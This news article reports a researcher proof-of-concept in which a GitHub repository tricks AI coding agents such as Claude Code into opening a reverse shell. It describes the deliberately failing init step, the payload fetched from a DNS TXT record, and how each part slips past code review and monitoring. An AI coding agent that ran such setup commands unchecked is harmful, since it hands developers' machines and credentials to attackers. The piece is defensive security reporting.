Malicious GitHub Repo Tricks AI Coders into Remote Code Execution
Researchers demonstrate how a clean-looking GitHub repository can exploit AI coding agents like Claude Code to establish a reverse shell on a developer's system, granting attackers full control.
Researchers from Mozilla's Zero Day Investigative Network (0DIN) have unveiled a sophisticated proof-of-concept attack that leverages indirect prompt injection to compromise developer systems via AI coding agents. The attack, detailed on June 25, 2026, demonstrates how a seemingly innocuous GitHub repository can trick agents like Claude Code into executing a reverse shell, granting attackers complete control over a developer's machine.
This exploit targets agentic coding tools by embedding malicious instructions within external content that the AI agent processes, rather than through direct user input. The outcome is severe: a fully interactive shell operating with the developer's privileges, capable of accessing sensitive environment secrets such as API keys and cloud credentials. The OWASP Foundation has identified prompt injection as LLM01:2025, the most critical vulnerability in AI applications, and this research underscores its potential for total system compromise.
The attack chain is designed to be stealthy, relying on three components that appear harmless individually. First, a GitHub repository presents a legitimate-looking README for a fictional tool named "Axiom." The setup instructions, including installing dependencies and running python3 -m axiom init, are standard and would pass any manual code review.
Second, the Python package is intentionally crafted to fail on its first execution, raising a RuntimeError that prompts the user to run python3 -m axiom init. This mimics a common software pattern, making the error appear routine and prompting the AI agent to attempt a standard recovery procedure.
Third, the init command triggers a shell script that fetches its payload from a attacker-controlled DNS TXT record. The script uses dig to query a specific DNS record, retrieves a base64-encoded reverse shell payload, decodes it, and executes it using bash. This method ensures the malicious code is never present in the repository itself, evading static analysis and human inspection.
When a developer asks Claude Code to set up the project, the AI agent autonomously installs dependencies, encounters the error, and attempts to fix it by running the init command. This script then resolves the DNS record, retrieves the payload, and establishes a reverse shell connection to the attacker's server. The developer's terminal output remains clean, showing only "Initialising Axiom platform... Environment ready."
Once the reverse shell is active, attackers gain full interactive access, all environment secrets, and the ability to establish persistence mechanisms like dropping SSH keys or installing cron jobs. Crucially, the payload can be updated dynamically via the DNS record without any changes to the repository, leaving no trace for security tools.
This attack vector is not limited to Claude Code; it affects any agentic coding tool that autonomously follows setup flows, including Cursor and Gemini CLI. The fundamental architectural flaw lies in the separation of components across different systems that are never analyzed in conjunction. Static code analysis misses the DNS payload, human review sees only legitimate setup steps, and network monitoring finds only routine DNS lookups. This research highlights the urgent need for vendors to implement transparent runtime execution chains and for developers to adopt sandbox-first workflows when dealing with unfamiliar code.